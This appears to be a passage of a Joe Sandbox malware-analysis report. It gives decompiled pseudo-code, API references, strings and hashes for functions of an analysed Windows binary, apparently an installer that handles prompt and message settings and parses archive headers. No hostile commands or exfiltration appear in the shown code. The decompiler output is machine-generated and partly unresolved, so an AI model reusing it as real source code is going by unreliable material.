Opcode ID: 474c15fc286f1518c63e257077c4c3c6a9e87f05ac2da54efc38b817510977b0
Instruction ID: 8a838fedbf1cd3f57b408fd45307b2668bf9ac3bef67c8916e08563063fd3bd5
Opcode Fuzzy Hash: 474c15fc286f1518c63e257077c4c3c6a9e87f05ac2da54efc38b817510977b0
Instruction Fuzzy Hash: 13112B319480096ACB05F792DC53DFEB7799E54314F10016FF712A21A1EF686AC6C699

Uniqueness

Uniqueness Score: -1.00%

Function 00403782, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00403782(void* __ecx, void* __edx) {
				char _v16;
				char _v28;
				void* _t18;
				void* _t34;
				void* _t51;
				void* _t52;
				intOrPtr* _t53;

				_t51 = __ecx;
				_t52 = __edx;
				E00411B60(_t18,  &_v16);
				E00411C48( &_v16, __edx);
				E00411CA3( &_v16, "\\");
				E00411B84( &_v28, L"%%M\\");
				E00411F27(__ecx,  &_v28,  &_v16);
				_push(_v28);
				L004191B0();
				E00411C48( &_v16, _t52);
				E00411CA3( &_v16, "/");
				E00411B84( &_v28, L"%%M/");
				E00411F27(_t51,  &_v28,  &_v16);
				L004191B0();
				 *_t53 = L"%%M";
				E00411B84( &_v28, _v28);
				_t34 = E00411F27(_t51,  &_v28, _t52);
				_push(_v28);
				L004191B0();
				_push(_v16);
				L004191B0();
				return _t34;
			}

0x0040378a
0x0040378f
0x00403791
0x0040379a
0x004037a7
0x004037b4
0x004037c3
0x004037c8
0x004037cb
0x004037d5
0x004037e2
0x004037ef
0x004037fe
0x00403806
0x0040380e
0x00403815
0x00403821
0x00403826
0x00403829
0x0040382e
0x00403831
0x0040383b

APIs

Part of subcall function 00411B60: ??2@YAPAXI@Z.MSVCRT ref: 00411B68

Part of subcall function 00411C48: ??2@YAPAXI@Z.MSVCRT ref: 00411C70
Part of subcall function 00411C48: ??3@YAXPAX@Z.MSVCRT ref: 00411C79
Part of subcall function 00411C48: memcpy.MSVCRT ref: 00411C93

Part of subcall function 00411CA3: memcpy.MSVCRT ref: 00411CD0

Part of subcall function 00411B84: memcpy.MSVCRT ref: 00411BAA

??3@YAXPAX@Z.MSVCRT ref: 004037CB
??3@YAXPAX@Z.MSVCRT ref: 00403806
??3@YAXPAX@Z.MSVCRT ref: 00403829
??3@YAXPAX@Z.MSVCRT ref: 00403831

Strings

%%M\, xrefs: 004037AC
%%M/, xrefs: 004037E7

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: ??3@$memcpy$??2@
String ID: %%M/$%%M\
API String ID: 3447362686-4143866494
Opcode ID: 0adc32411c15e763c7ec574fd419cf63b4a7b3073318563bdfb54617e37799bb
Instruction ID: 030220e8798e44c826c8ca556ead690550140fee0cdfed357d3ace2c4a35e24d
Opcode Fuzzy Hash: 0adc32411c15e763c7ec574fd419cf63b4a7b3073318563bdfb54617e37799bb
Instruction Fuzzy Hash: E2112B329480096ACB05F792DC53DFEB7799E54314F10016FF612A21A1EF686AC6C699

Uniqueness

Uniqueness Score: -1.00%

Function 00415556, Relevance: 10.5, APIs: 7, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00415556(intOrPtr* __ecx) {
				intOrPtr _t20;
				intOrPtr* _t22;
				intOrPtr* _t28;

				 *__ecx = 0;
				_push( *((intOrPtr*)(__ecx + 8)));
				L004191B0();
				 *((intOrPtr*)(__ecx + 8)) = 0;
				 *((intOrPtr*)(__ecx + 4)) = 0;
				 *((intOrPtr*)(__ecx + 0x10)) = 0;
				 *((intOrPtr*)(__ecx + 0x1c)) = 0;
				_push( *((intOrPtr*)(__ecx + 0x24)));
				L004191B0();
				 *((intOrPtr*)(__ecx + 0x24)) = 0;
				_push( *((intOrPtr*)(__ecx + 0x28)));
				L004191B0();
				 *((intOrPtr*)(__ecx + 0x28)) = 0;
				_push( *((intOrPtr*)(__ecx + 0x2c)));
				L004191B0();
				 *((intOrPtr*)(__ecx + 0x2c)) = 0;
				_push( *((intOrPtr*)(__ecx + 0x30)));
				L004191B0();
				 *((intOrPtr*)(__ecx + 0x30)) = 0;
				_push( *((intOrPtr*)(__ecx + 0x34)));
				L004191B0();
				 *((intOrPtr*)(__ecx + 0x34)) = 0;
				_push( *((intOrPtr*)(__ecx + 0x38)));
				L004191B0();
				 *((intOrPtr*)(__ecx + 0x38)) = 0;
				_t22 = __ecx + 0x3c;
				_pop(_t27);
				_t28 = _t22;
				_t20 =  *_t28;
				if(_t20 != 0) {
					_push(_t20);
					L004191B0();
					 *_t28 = 0;
				}
				 *((intOrPtr*)(_t28 + 4)) = 0;
				return _t20;
			}

0x0041555c
0x0041555e
0x00415561
0x00415566
0x00415569
0x0041556c
0x0041556f
0x00415572
0x00415575
0x0041557a
0x0041557d
0x00415580
0x00415585
0x00415588
0x0041558b
0x00415590
0x00415593
0x00415596
0x0041559b
0x0041559e
0x004155a1
0x004155a6
0x004155a9
0x004155ac
0x004155b4
0x004155b8
0x004155bb
0x0040b7b1
0x0040b7b3
0x0040b7b7
0x0040b7b9
0x0040b7ba
0x0040b7c2
0x0040b7c2
0x0040b7c8
0x0040b7d0

APIs

??3@YAXPAX@Z.MSVCRT ref: 00415561
??3@YAXPAX@Z.MSVCRT ref: 00415575
??3@YAXPAX@Z.MSVCRT ref: 00415580
??3@YAXPAX@Z.MSVCRT ref: 0041558B
??3@YAXPAX@Z.MSVCRT ref: 00415596
??3@YAXPAX@Z.MSVCRT ref: 004155A1
??3@YAXPAX@Z.MSVCRT ref: 004155AC

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: 3145a213dfb67cfef2cd3f2f581fb204e64d657f4ca8865bd35bccdbfbf1d0a0
Instruction ID: 4fa50ddcceeb69e8f72710d2ea5ebf37512df2501741efa383495b0307b540d7
Opcode Fuzzy Hash: 3145a213dfb67cfef2cd3f2f581fb204e64d657f4ca8865bd35bccdbfbf1d0a0
Instruction Fuzzy Hash: E701C0B1800B41ABD231AF27C919887FEF2FF94304344592FE08702A25CB75B891DF88

Uniqueness

Uniqueness Score: -1.00%

Function 0040A049, Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 166
sleepCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E0040A049() {
				signed int _v8;
				intOrPtr _v32;
				intOrPtr _v36;
				char* _v88;
				char* _v92;
				signed int _t25;
				signed int _t30;
				void* _t33;
				signed short* _t39;

				_v8 = _v8 & 0x00000000;
				_t39 =  *0x41e8dc; // 0xbc2790
				_t25 =  *_t39 & 0x0000ffff;
				if(_t25 == 0) {
					L46:
					return _v8;
				} else {
					_t30 = 0x64;
					do {
						_t33 = (_t25 & 0x0000ffff) + 0xffffffbe;
						if(_t33 > 0x38) {
							goto L44;
						}
						switch( *((intOrPtr*)(( *(_t33 + 0x40a2c9) & 0x000000ff) * 4 +  &M0040A29D))) {
							case 0:
								if(E00405041() == 0) {
									if( *_t39 != 0x42) {
										_v8 = _t30;
									} else {
										_t27 = L"BeginPrompt";
									}
								}
								_t36 =  *0x41e738; // 0xbce7c8
								E00408C28(_t36, _t27);
								goto L44;
							case 1:
								__eflags =  *0x41e44c & 0x00000100;
								if(__eflags != 0) {
									L12:
									__ecx =  &_v88;
									__eax = E004076D3( &_v88, __edx, __eflags);
									__ecx =  &_v88;
									_v88 = 0x41bfb4;
									__eax = E004080A7(0);
									goto L13;
								}
								__eflags = __ax - 0x43;
								if(__eflags == 0) {
									goto L12;
								}
								goto L11;
							case 2:
								__eflags =  *0x41e770 - 2;
								if( *0x41e770 != 2) {
									L20:
									__eax = E00408D16(__edx);
									goto L44;
								}
								__eflags = __ax - 0x45;
								if(__eflags != 0) {
									goto L11;
								}
								goto L20;
							case 3:
								__edx = 0;
								__ecx = L"FinishMessage";
								__esi = E00405041();
								__eflags = __esi;
								if(__esi == 0) {
									__eflags =  *__edi - 0x46;
									if( *__edi == 0x46) {
										__esi = L"FinishMessage";
									}
								}
								__eflags =  *0x41e458;
								if(__eflags < 0) {
									 *0x41e458 = 1;
									__eflags =  *0x41e458;
								}
								if(__eflags > 0) {
									L31:
									__ecx =  &_v88;
									__eax = E004076D3( &_v88, __edx, __eflags);
									__ecx =  &_v88;
									_v88 = "G]@";
									_v32 = 0x7d5;
									__eax = E00407A45( &_v88, 0x11,  *0x41e738, __esi, 0);
									L13:
									__ecx =  &_v88;
									goto L14;
								} else {
									__eflags =  *__edi - 0x46;
									if(__eflags != 0) {
										goto L11;
									}
									goto L31;
								}
							case 4:
								__edx = 0;
								__ecx = L"HelpText";
								__eax = E00405041();
								__esi = __eax;
								__eflags = __eax;
								if(__eflags != 0) {
									L36:
									__ecx =  &_v92;
									__eax = E004076D3( &_v92, __edx, __eflags);
									__ecx =  &_v92;
									_v92 = "G]@";
									_v36 = 0x7d6;
									__eax = E00407A45( &_v92, 0x11,  *0x41e738, __esi, 0);
									__ecx =  &_v92;
									L14:
									__eax = E00407734(__eax, __ecx);
									goto L44;
								}
								__eflags =  *__edi - 0x48;
								if(__eflags != 0) {
									L35:
									_v8 = __ebx;
									goto L36;
								}
								_push(0x18);
								_pop(__ecx);
								__eax = E00403DC8(L"HelpText");
								__esi = __eax;
								__eflags = __eax;
								if(__eflags != 0) {
									goto L36;
								}
								goto L35;
							case 5:
								__ecx =  *0x41e44c;
								__ecx =  *0x41e44c & 0x000000c0;
								__eflags = __cl - 0x80;
								if(__cl == 0x80) {
									L17:
									__edx =  *0x41e748; // 0xbcbb48
									__ecx =  *0x41e754; // 0xbcbb18
									__eax = E00408CC3(__ecx, __edx);
									goto L44;
								}
								__eflags = __ax - 0x50;
								if(__eflags != 0) {
									goto L11;
								}
								goto L17;
							case 6:
								__esi = 0x41e7f0;
								__ecx = 0x41e7f0;
								__eax = E00408D7B(0x41e7f0, __edx, __eflags);
								do {
									Sleep(__ebx);
									__ecx = 0x41e7f0;
									__eflags = E0040769B(0x41e7f0);
								} while (__eflags != 0);
								goto L44;
							case 7:
								__edx = 0;
								__ecx = L"WarningTitle";
								__eax = E00405041();
								__eflags = __eax;
								if(__eax != 0) {
									L42:
									_push(0x2a);
									_pop(__ecx);
									__ecx = E00403DC8(__ecx);
									__eax = E004096FF(__ecx, __edx, __eflags);
									goto L44;
								}
								__eflags =  *__edi - 0x57;
								if(__eflags != 0) {
									goto L11;
								}
								goto L42;
							case 8:
								__eax = E00401080(__edx, __eflags);
								goto L44;
							case 9:
								__edx = 0;
								__ecx = L"ErrorTitle";
								__eax = E00405041();
								__eflags = __eax;
								if(__eax != 0) {
									L23:
									_push(0xf);
									_push(0);
									__eax = E0040976C(__edx);
									_pop(__ecx);
									_pop(__ecx);
									goto L44;
								}
								__eflags =  *__edi - 0x5a;
								if(__eflags != 0) {
									L11:
									_v8 = __ebx;
									goto L44;
								}
								goto L23;
							case 0xa:
								goto L44;
						}
						L44:
						_t39 =  &(_t39[1]);
						_t25 =  *_t39 & 0x0000ffff;
					} while (_t25 != 0);
					goto L46;
				}
			}

0x0040a04f
0x0040a054
0x0040a05a
0x0040a060
0x0040a295
0x0040a29a
0x0040a066
0x0040a06a
0x0040a06b
0x0040a06e
0x0040a074
0x00000000
0x00000000
0x0040a081
0x00000000
0x0040a098
0x0040a09e
0x0040a0a4
0x0040a0a0
0x0040a0a0
0x0040a0a0
0x0040a09e
0x0040a0a7
0x0040a0af
0x00000000
0x00000000
0x0040a0b9
0x0040a0c3
0x0040a0d3
0x0040a0d3
0x0040a0d6
0x0040a0dd
0x0040a0e0
0x0040a0e7
0x00000000
0x0040a0e7
0x0040a0c5
0x0040a0c9
0x00000000
0x00000000
0x00000000
0x00000000
0x0040a126
0x0040a12d
0x0040a135
0x0040a135
0x00000000
0x0040a135
0x0040a12f
0x0040a133
0x00000000
0x00000000
0x00000000
0x00000000
0x0040a169
0x0040a16b
0x0040a175
0x0040a177
0x0040a179
0x0040a17b
0x0040a17f
0x0040a181
0x0040a181
0x0040a17f
0x0040a186
0x0040a18d
0x0040a18f
0x0040a199
0x0040a199
0x0040a1a0
0x0040a1ac
0x0040a1ac
0x0040a1af
0x0040a1bd
0x0040a1c2
0x0040a1c9
0x0040a1d0
0x0040a0ec
0x0040a0ec
0x00000000
0x0040a1a2
0x0040a1a2
0x0040a1a6
0x00000000
0x00000000
0x00000000
0x0040a1a6
0x00000000
0x0040a1da
0x0040a1dc
0x0040a1e1
0x0040a1e6
0x0040a1e8
0x0040a1ea
0x0040a203
0x0040a203
0x0040a206
0x0040a214
0x0040a219
0x0040a220
0x0040a227
0x0040a22c
0x0040a0ef
0x0040a0ef
0x00000000
0x0040a0ef
0x0040a1ec
0x0040a1f0
0x0040a200
0x0040a200
0x00000000
0x0040a200
0x0040a1f2
0x0040a1f4
0x0040a1f5
0x0040a1fa
0x0040a1fc
0x0040a1fe
0x00000000
0x00000000
0x00000000
0x00000000
0x0040a0f9
0x0040a0ff
0x0040a105
0x0040a108
0x0040a110
0x0040a110
0x0040a116
0x0040a11c
0x00000000
0x0040a11c
0x0040a10a
0x0040a10e
0x00000000
0x00000000
0x00000000
0x00000000
0x0040a234
0x0040a239
0x0040a23b
0x0040a240
0x0040a241
0x0040a247
0x0040a24e
0x0040a24e
0x00000000
0x00000000
0x0040a254
0x0040a256
0x0040a25b
0x0040a260
0x0040a262
0x0040a26e
0x0040a26e
0x0040a270
0x0040a276
0x0040a278
0x00000000
0x0040a278
0x0040a264
0x0040a268
0x00000000
0x00000000
0x00000000
0x00000000
0x0040a27f
0x00000000
0x00000000
0x0040a13f
0x0040a141
0x0040a146
0x0040a14b
0x0040a14d
0x0040a159
0x0040a159
0x0040a15b
0x0040a15d
0x0040a162
0x0040a163
0x00000000
0x0040a163
0x0040a14f
0x0040a153
0x0040a0cb
0x0040a0cb
0x00000000
0x0040a0cb
0x00000000
0x00000000
0x00000000
0x00000000
0x0040a284
0x0040a284
0x0040a287
0x0040a28a
0x00000000
0x0040a294

APIs

Sleep.KERNEL32(00000064,0041E89C,00000000,00000000), ref: 0040A241

Strings

ErrorTitle, xrefs: 0040A141
WarningTitle, xrefs: 0040A256
BeginPrompt, xrefs: 0040A088
HelpText, xrefs: 0040A1DC
FinishMessage, xrefs: 0040A16B, 0040A181, 0040A1B6

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: Sleep
String ID: BeginPrompt$ErrorTitle$FinishMessage$HelpText$WarningTitle
API String ID: 3472027048-1960609661
Opcode ID: cf9250849fedc6f67974e0ceab6cd0c6a5807e8a287a7b517c2b9e144e56b559
Instruction ID: 6ded7748b71ab9f5b936a386d8eac6af1666c8eea906bb290fcf471db964143e
Opcode Fuzzy Hash: cf9250849fedc6f67974e0ceab6cd0c6a5807e8a287a7b517c2b9e144e56b559
Instruction Fuzzy Hash: 6151B134E0174587EB24ABA689117AE73A1AF50318F14807FE8023B3D1EB7D59A5D64F

Uniqueness

Uniqueness Score: -1.00%

Function 00416E4A, Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 354
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00416E4A(void* __ecx, void* __edx, void* __eflags, signed int _a4, signed int _a7, signed int _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t223;
				signed int _t233;
				signed int _t234;
				signed int _t236;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				signed int _t249;
				intOrPtr _t254;
				void* _t256;
				void* _t257;
				void* _t258;
				signed char _t260;
				intOrPtr _t264;
				void* _t269;
				signed int _t270;
				void* _t271;
				signed int _t275;
				signed int _t295;
				intOrPtr _t297;
				intOrPtr _t310;
				signed int _t314;
				intOrPtr _t316;
				signed int _t317;
				char _t319;
				signed int _t321;
				signed int _t326;
				signed int _t333;
				void* _t334;
				intOrPtr _t335;
				intOrPtr* _t336;
				signed int _t338;
				void* _t347;
				void* _t348;

				_t349 = __eflags;
				_t347 = __ecx;
				E004168B6(__ecx, __edx, _t334, __eflags, 0xb, 0);
				_t223 = E004160BB( *((intOrPtr*)(__ecx + 0x38)), __edx, __ecx, __eflags);
				_v12 = _v12 & 0x00000000;
				_t335 = _t223;
				_v32 = _t335;
				_v64 = 0;
				E004167E7( &_v68, __edx, _t348, __eflags, _t347, _a4);
				_t275 = _a8;
				_t11 = _t335 + 1; // 0x1
				_v28 =  *((intOrPtr*)( *(_t347 + 0x38) + 8)) +  *( *(_t347 + 0x38));
				 *((intOrPtr*)(_t275 + 4)) = _t335;
				_a4 = _t11;
				E00416221(E004161F4(_t275 + 0x30, __eflags, _t11), _t275 + 0x34, _t335);
				E004161F4(_t275 + 0x38, _t349, _a4);
				_t336 = _t275 + 0x2c;
				E004161F4(_t336, _t349, _v32 + 1);
				_t233 = 0;
				_v92 = 0;
				_v88 = 0;
				_v84 = 0;
				_v80 = 0;
				_v76 = 0;
				_v72 = 0;
				_v44 = 0;
				_v20 =  *(_t347 + 0x38);
				_v24 = 0;
				_t350 = _v32;
				if(_v32 > 0) {
					while(1) {
						_t337 = _v24;
						_t326 =  *((intOrPtr*)( *(_t347 + 0x38) + 8)) - _v28 +  *( *(_t347 + 0x38));
						 *( *(_t275 + 0x38) + _v24 * 4) = _t326;
						_t288 = _v20;
						_v40 = _t233;
						_a8 = _t233;
						_t234 = E004160BB(_v20, _t326, _t347, __eflags);
						_v8 = _t234;
						__eflags = _t234;
						if(_t234 == 0) {
							break;
						}
						__eflags = _t234 - 0x40;
						if(_t234 > 0x40) {
							break;
						}
						_v36 = _v36 & 0x00000000;
						__eflags = _t234;
						if(_t234 == 0) {
							L37:
							_t288 = 1;
							__eflags = _t234 - 1;
							if(_t234 != 1) {
								L40:
								_t337 = _a8;
								__eflags = _a8 - _t234 - 1;
								if(__eflags < 0) {
									break;
								}
								E004167C5( &_v92, _t337, __eflags);
								_t338 = _v8;
								E004167C5( &_v80, _t338, __eflags);
								_a4 = _a4 & 0x00000000;
								_t337 = _t338 - 1;
								__eflags = _t337;
								_v36 = _t337;
								if(__eflags == 0) {
									L47:
									_t337 = _a8 - _v36;
									_v36 = _t337;
									__eflags = _t337 - 1;
									if(_t337 == 1) {
										L52:
										_t245 = 0;
										__eflags = 0 - _v8;
										if(__eflags >= 0) {
											L58:
											if(__eflags == 0) {
												break;
											}
											L59:
											_t246 = _v24;
											_t295 = _v12;
											_t336 = _t275 + 0x2c;
											 *((intOrPtr*)( *_t336 + _t246 * 4)) = _t295;
											_v12 = _t295 + _v8;
											_t297 = _v44;
											 *((intOrPtr*)( *((intOrPtr*)(_t275 + 0x30)) + _t246 * 4)) = _t297;
											_v44 = _t297 + _v36;
											 *((char*)(_t246 +  *((intOrPtr*)(_t275 + 0x34)))) = _v40;
											_t247 = _t246 + 1;
											_v24 = _t247;
											__eflags = _t247 - _v32;
											if(_t247 < _v32) {
												_t233 = 0;
												__eflags = 0;
												continue;
											}
											goto L1;
										} else {
											goto L53;
										}
										while(1) {
											L53:
											_t288 = _v80;
											__eflags =  *((char*)(_t288 + _t245));
											if( *((char*)(_t288 + _t245)) == 0) {
												break;
											}
											_t245 = _t245 + 1;
											__eflags = _t245 - _v8;
											if(_t245 < _v8) {
												continue;
											}
											L57:
											__eflags = _t245 - _v8;
											goto L58;
										}
										_v40 = _t245;
										goto L57;
									}
									_a4 = _a4 & 0x00000000;
									__eflags = _t337;
									if(__eflags == 0) {
										goto L52;
									} else {
										goto L49;
									}
									while(1) {
										L49:
										_t288 = _v20;
										_t256 = E004160BB(_v20, _t326, _t347, __eflags);
										__eflags = _t256 - _a8;
										if(_t256 >= _a8) {
											goto L61;
										}
										_t288 = _v92;
										__eflags =  *((char*)(_t256 + _t288));
										if( *((char*)(_t256 + _t288)) != 0) {
											goto L61;
										}
										_a4 = _a4 + 1;
										 *((char*)(_t256 + _t288)) = 1;
										__eflags = _a4 - _t337;
										if(__eflags < 0) {
											continue;
										}
										goto L52;
									}
									break;
								} else {
									goto L42;
								}
								while(1) {
									L42:
									_t288 =  *(_t347 + 0x38);
									_t257 = E004160BB( *(_t347 + 0x38), _t326, _t347, __eflags);
									__eflags = _t257 - _a8;
									if(_t257 >= _a8) {
										goto L61;
									}
									_t288 = _v92;
									__eflags =  *((char*)(_t257 + _t288));
									if(__eflags != 0) {
										goto L61;
									}
									 *((char*)(_t257 + _t288)) = 1;
									_t288 =  *(_t347 + 0x38);
									_t258 = E004160BB( *(_t347 + 0x38), _t326, _t347, __eflags);
									__eflags = _t258 - _v8;
									if(_t258 >= _v8) {
										goto L61;
									}
									_t288 = _v80;
									__eflags =  *((char*)(_t258 + _t288));
									if( *((char*)(_t258 + _t288)) != 0) {
										goto L61;
									}
									_a4 = _a4 + 1;
									 *((char*)(_t258 + _t288)) = 1;
									__eflags = _a4 - _v36;
									if(__eflags < 0) {
										continue;
									}
									goto L47;
								}
								break;
							}
							__eflags = _a8 - 1;
							if(_a8 != 1) {
								goto L40;
							}
							_v40 = _v40 & 0x00000000;
							_v36 = 1;
							goto L59;
						} else {
							goto L8;
						}
						while(1) {
							L8:
							_t337 = _v20;
							_t288 = _t337;
							_t260 = E00415F52(_t337, _t337);
							_a7 = _t260;
							__eflags = _t260 & 0x000000c0;
							if((_t260 & 0x000000c0) != 0) {
								goto L61;
							}
							_t288 = _t260 & 0xf;
							_v52 = _t288;
							__eflags = _t288 - 8;
							if(_t288 > 8) {
								goto L61;
							}
							_t326 =  *(_t337 + 8);
							__eflags = _t288 -  *((intOrPtr*)(_t337 + 4)) - _t326;
							if(_t288 >  *((intOrPtr*)(_t337 + 4)) - _t326) {
								L62:
								_t236 = E00415EBA(_t288, _t337);
								L63:
								__eflags = _t236 - 0xa;
								if(_t236 != 0xa) {
									L66:
									E004163EB( *(_t347 + 0x38), _t326);
									L67:
									_t236 = E00416087( *(_t347 + 0x38));
									if((_t236 | _t326) != 0) {
										goto L63;
									}
									return _t236;
								}
								__eflags = _t326;
								if(__eflags != 0) {
									goto L66;
								}
								E00416D08(_t347, __eflags, _v32, _t275 + 0xc);
								goto L67;
							}
							_v60 = _v60 & 0x00000000;
							_v56 = _v56 & 0x00000000;
							_v16 = _v16 & 0x00000000;
							_t264 =  *_t337 + _t326;
							_v48 = _t264;
							__eflags = _t288;
							if(_t288 == 0) {
								L16:
								 *(_t337 + 8) =  *(_t337 + 8) + _t288;
								__eflags =  *((intOrPtr*)(_t275 + 0x50)) - 0x80;
								if( *((intOrPtr*)(_t275 + 0x50)) < 0x80) {
									_t288 = _t275 + 0x4c;
									E004169F7(_t275 + 0x4c, _v60, _v56);
								}
								__eflags = _a7 & 0x00000010;
								_v16 = 1;
								if(__eflags == 0) {
									L21:
									_a8 = _a8 + _v16;
									__eflags = _a8 - 0x40;
									if(_a8 > 0x40) {
										goto L61;
									}
									__eflags = _a7 & 0x00000020;
									if(__eflags == 0) {
										L35:
										_v36 = _v36 + 1;
										__eflags = _v36 - _v8;
										if(_v36 < _v8) {
											continue;
										}
										_t234 = _v8;
										goto L37;
									}
									_t269 = E004160BB(_t337, _t326, _t347, __eflags);
									_t288 =  *((intOrPtr*)(_t337 + 4)) -  *(_t337 + 8);
									__eflags = _t269 -  *((intOrPtr*)(_t337 + 4)) -  *(_t337 + 8);
									if(_t269 >  *((intOrPtr*)(_t337 + 4)) -  *(_t337 + 8)) {
										goto L62;
									}
									__eflags = _v60 - 0x21;
									if(_v60 != 0x21) {
										L29:
										__eflags = _v60 - 0x30101;
										if(_v60 == 0x30101) {
											__eflags = _v56;
											if(_v56 == 0) {
												__eflags = _t269 - 5;
												if(_t269 == 5) {
													_t314 =  *(_t347 + 0x38);
													_t326 =  *(_t314 + 8);
													_t316 =  *((intOrPtr*)(_t326 +  *_t314 + 1));
													__eflags =  *((intOrPtr*)(_t275 + 0x48)) - _t316;
													if( *((intOrPtr*)(_t275 + 0x48)) < _t316) {
														 *((intOrPtr*)(_t275 + 0x48)) = _t316;
													}
												}
											}
										}
										L34:
										_t149 = _t337 + 8;
										 *_t149 =  *(_t337 + 8) + _t269;
										__eflags =  *_t149;
										goto L35;
									}
									__eflags = _v56;
									if(_v56 != 0) {
										goto L29;
									}
									__eflags = _t269 - 1;
									if(_t269 == 1) {
										_t317 =  *(_t347 + 0x38);
										_t326 =  *(_t317 + 8);
										_t319 =  *((intOrPtr*)(_t326 +  *_t317));
										__eflags =  *((intOrPtr*)(_t275 + 0x44)) - _t319;
										if( *((intOrPtr*)(_t275 + 0x44)) < _t319) {
											 *((char*)(_t275 + 0x44)) = _t319;
										}
									}
									goto L34;
								} else {
									_t288 = _t337;
									_t270 = E004160BB(_t337, _t326, _t347, __eflags);
									_v16 = _t270;
									__eflags = _t270 - 0x40;
									if(__eflags > 0) {
										goto L61;
									}
									_t288 = _t337;
									_t271 = E004160BB(_t337, _t326, _t347, __eflags);
									__eflags = _t271 - 1;
									if(_t271 != 1) {
										goto L61;
									}
									goto L21;
								}
							} else {
								goto L14;
								L14:
								_t321 = _v60;
								asm("cdq");
								_t288 = _v52;
								_t326 = _t326 | (_v56 << 0x00000020 | _t321) << 0x8;
								_v16 = _v16 + 1;
								_v60 =  *(_v16 + _t264) & 0x000000ff | _t321 << 0x00000008;
								_v56 = _t326;
								__eflags = _v16 - _t288;
								if(_v16 < _t288) {
									_t264 = _v48;
									goto L14;
								} else {
									_t337 = _v20;
									goto L16;
								}
							}
						}
						break;
					}
					L61:
					E00415EDA(_t288);
					goto L62;
				}
				L1:
				_t249 = _v24;
				 *((intOrPtr*)( *_t336 + _t249 * 4)) = _v12;
				 *((intOrPtr*)( *((intOrPtr*)(_t275 + 0x30)) + _t249 * 4)) = _v44;
				_t326 =  *(_t275 + 0x38);
				 *((intOrPtr*)(_t326 + _t249 * 4)) =  *((intOrPtr*)( *(_t347 + 0x38) + 8)) - _v28 +  *( *(_t347 + 0x38));
				E0040C020(_t275 + 0x3c, _v28,  *((intOrPtr*)( *(_t347 + 0x38) + 8)) - _v28 +  *( *(_t347 + 0x38)));
				_push(_v80);
				L004191B0();
				_push(_v92);
				L004191B0();
				E00415EF3( &_v68);
				E004168B6(_t347, _t326,  *((intOrPtr*)( *(_t347 + 0x38) + 8)) - _v28 +  *( *(_t347 + 0x38)), _t350, 0xc, 0);
				E004161C7(_t275 + 0x28, _t350, _v12);
				_a4 = _a4 & 0x00000000;
				if(_v12 <= 0) {
					goto L67;
				} else {
					goto L2;
				}
				do {
					L2:
					_t254 = E00416087( *(_t347 + 0x38));
					_t310 =  *((intOrPtr*)(_t275 + 0x28));
					_v64 = _t326;
					_t333 = _a4;
					 *((intOrPtr*)(_t310 + _t333 * 8)) = _t254;
					 *(_t310 + 4 + _t333 * 8) = _v64;
					_t326 = _t333 + 1;
					_a4 = _t326;
				} while (_t326 < _v12);
				goto L67;
			}

0x00416e4a
0x00416e57
0x00416e59
0x00416e61
0x00416e69
0x00416e6d
0x00416e73
0x00416e76
0x00416e7c
0x00416e89
0x00416e8c
0x00416e8f
0x00416e96
0x00416e99
0x00416ea5
0x00416eb0
0x00416eb9
0x00416ebf
0x00416ec7
0x00416ec9
0x00416ecc
0x00416ecf
0x00416ed2
0x00416ed5
0x00416ed8
0x00416edb
0x00416ede
0x00416ee1
0x00416ee4
0x00416ee7
0x00416f92
0x00416f9b
0x00416f9e
0x00416fa3
0x00416fa6
0x00416fa9
0x00416fac
0x00416faf
0x00416fb4
0x00416fb7
0x00416fb9
0x00000000
0x00000000
0x00416fbf
0x00416fc2
0x00000000
0x00000000
0x00416fc8
0x00416fcc
0x00416fce
0x00417131
0x00417133
0x00417134
0x00417136
0x00417149
0x00417149
0x0041714d
0x0041714f
0x00000000
0x00000000
0x00417158
0x0041715d
0x00417163
0x00417168
0x0041716c
0x0041716c
0x0041716d
0x00417170
0x004171c1
0x004171c4
0x004171c7
0x004171ca
0x004171cd
0x004171f9
0x004171f9
0x004171fb
0x004171fe
0x00417217
0x00417217
